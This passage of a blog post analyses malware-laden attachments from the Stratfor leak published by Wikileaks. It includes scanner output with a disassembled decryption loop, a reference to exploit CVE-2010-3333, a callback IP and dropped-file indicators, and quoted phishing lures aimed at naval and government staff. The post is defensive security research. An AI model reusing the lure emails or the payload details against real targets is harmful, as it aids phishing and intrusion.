We shouldn't be convinced that this is the entire payload. The IP address included here has been recorded as a part of Marker.T since 2002. Just to be on the safe side, I tried it - there are no FTP connections being accepted at 184.108.40.206, which looks like it is assigned to a Vietnamese restaurant in New Jersey.
Using OfficeMalScanner provides further information:
[*] SCAN mode selected [*] Opening file 117870_Hybrid write-up2.doc [*] Filesize is 604672 (0x93a00) Bytes [*] Ms Office OLE2 Compound Format document detected [*] Scanning now...
+++++ decryption loop detected at offset: 0x00019eb8 +++++ 33C9 xor ecx, ecx E7EE out EEh, eax 2974E835 sub [eax+ebp*8+35h], esi 79F7 jns $-07h 34A2 xor al, A2h 12F5 adc dh, ch 72F7 jb $-07h 94 xchg esp, eax BA0EE6EEA9 mov edx, A9EEE60Eh 7909 jns $+0Bh E615 out 15h, al 774F jnbe $+51h 51 push ecx B42F mov ah, 2Fh EE out dx, al 9E sahf
-------------------------------------------------------------------------- Brute-forcing for encrypted PE- and embedded OLE-files now... Bruting XOR Key: 0x01
Analysis finished! ------------------------------------------------------------------------ 117870_Hybrid write-up2.doc seems to be malicious! Malicious Index = 10 ------------------------------------------------------------------------
There appears to be an additional payload in these files that is encrypted, in addition to the VBScript macro that sits on top. Uncovering it will take me a bit more time.
In addition to these three files I have also been working on a fourth file that makes use of a different set of exploits, 6566_TheSplitBetw.doc. Don't be fooled by the .DOC extension, this is an RTF file. 6566_TheSplitBetw.doc uses a classic RTF exploit: CVE-2010-3333.
This exploit has been used in a number of attacks. In June 2011 a University of Louisville email server began sending out an email with an attachment claiming to be an "Insider's Guide to Military Benefits". The body of the email appeared to target Naval officers:
From: CDR Courtney Bricks [mailto:email@example.com]
Sent: Tuesday, May 31, 2011 11:23 PM
Subject: Defense News article of interest
Defense News article by Chris Cavas, from your interview last week is pasted below. Article appeared as a straight Q and A story, everything reads balanced and fair. Please let me know if you have any questions or concerns.
The U.S. Navy's major shipbuilding and aviation programs are largely setting into stability, but questions are rising about the strategic outlook for the Navy and Marine Corps and the forces they will need in the future, all in the context of a declining defense budget.
Navy Under Secretary Robert Work is in the center of the effort to define the Navy Department's direction and map out its future roles.
Then again in May of 2011 the same exploit was used as an attachment to an email titled "Courier who led U.S. to Osama bin Laden's hideout identified" which was sent to a significant number of US government email addresses.
Both times the payload was different. The exploit is a Metasploit module. It's been patched by Microsoft since 2010.
I am still in the process of investigating this however I am particularly interested in the creation of an executable, C:\a.exe as well as a secondary RTF file, Tripolitania.RTF. Tripolitania, incidentally, was the name for the Libyan city of Tripoli in the early 20th century, when it was an Italian colony. These Stratfor guys do seem to have an interest in history (NOTE: Tripolitania.RTF appears to be the name of the first version of this document). I've recovered a little bit of the actual text of the attachment, and it looks like it was culled from a web page from Students for a Free Tibet:
"Lobby your government leaders to speak up for Tibet and protest Chinese leaders when they travel abroad. Take part in international days of action and commemorate historic dates within the Tibet movement."
At this point very little conclusions can be drawn from this information besides the obvious: those downloading this content from Wikileaks must use significant security measures to ensure the safety and reliability of their computing systems. Media organizations, including Wikileaks, are publishing email attachments like the ones I have identified as infected with malware here as part of their coverage of these document leaks. It is possible, for example, to search and download emails and attachments from the Wikileaks site. It does not take a wild imagination to figure that those initially reviewing these documents could take significant security precautions, while such precautions become less vital through the editing process until very few precautions are taken by the end user, who expect this content to be sanitized before it is provided to them by a media organization.
When downloading and viewing these files, most are attempting to protect themselves from surveillance; things like NSA's XKEYSCORE. Few users are expecting the leaked files themselves to be a threat. While there is overlap between the sort of security precautions that would protect a computer against outside surveillance and infected files, there are significant differences. For example, if air gapping can be an effective deterrent against surveillance and some of the worst features of malware. However, the threat from surveillance is often considered transitory. After performing the task which needs to be protected from prying eyes, a user might not find it unreasonable to break their airgap and reconnect to the internet after deleting their secret files. Alternatively, a user might rely on a USB stick to transfer applications or files from the air-gapped computer to a network-available computer. All such activity are easily exploited by malicious software. To use a somewhat related analogy - Tor won't protect you from a keylogger.
This is why notification of malicious software in these files is important: so users can adjust their operational security plans to adjust for it.
There are a number of theories that could account for the presence of this malicious software. Perhaps the least-wildeyed of those theories is that Statfor employees were receiving these malicious files through email. Whether or not those employees did anything with those malicious files, they could have been retrieved by Lulzsec, who in turn provided them to Wikileaks. The data is indeed massive, over 5.5 million emails. Perhaps so massive that ~ two years was not long enough to properly review and sanitize these files prior to their complete publication in 2014 (from the time they were received by WL sometime around 2012).
That is not the only explanation. The Snowden revelations have spelled out in plain detail how the same organizations that have been very invested in the destruction of Wikileaks could very well be capable of putting malicious software into a remote server, or to redirect a file transfer so that malicious software was transferred.
This post should not be construed as a warning to avoid paying close attention to media coverage of intelligence controversies because of the threat of malicious software. Quite the opposite, really. The information contained in these "Global Intelligence Files" are of critical social importance. People around the world should be able to inform themselves without putting themselves at undue risk.
The good news is this: the malware I have so far identified is old. So old that those using the latest versions of the software noted as vulnerable earlier are very likely safe even when executing these files. I scanned a number of these files using Virus Total, and a significant number of anti-virus applications were able to detect an issue with the files. The flipside of this positive spin is that at best only half of the popular antivirus applications I used to test these files (I tested using roughly 70 antivirus programs) detected malicious software. Some files were only detected by 15 antivirus programs.
One last note: I will almost certainly be updating this post and writing additional information about what I find as I continue my research. This is very much a "work in progress". I welcome all additional information, particularly information that conflicts with or adds to what I have found so far.
NOTE: my second post on this on this topic is online, and contains further malware analysis.
Hector Monsegur, formerly sabu of Lulzsec, contacted me. Our discussion is available on my third post.
Earlier this week a young government contractor named Reality Winner was accused by police of leaking an internal NSA document to news outle...
UPDATE March 1st, 2017 : I'm glad to see that people are finding this helpful, and thanks to everyone that has contacted me here or via ...
So it turns out that setting your AWS EC2 server's hostname to be persistent across reboots is a surprising pain in the ass, at least wi...
The Problem The configuration of the system when this error was encountered is as follows: A. Windows Server 2008 R2 Redundant Domain Co...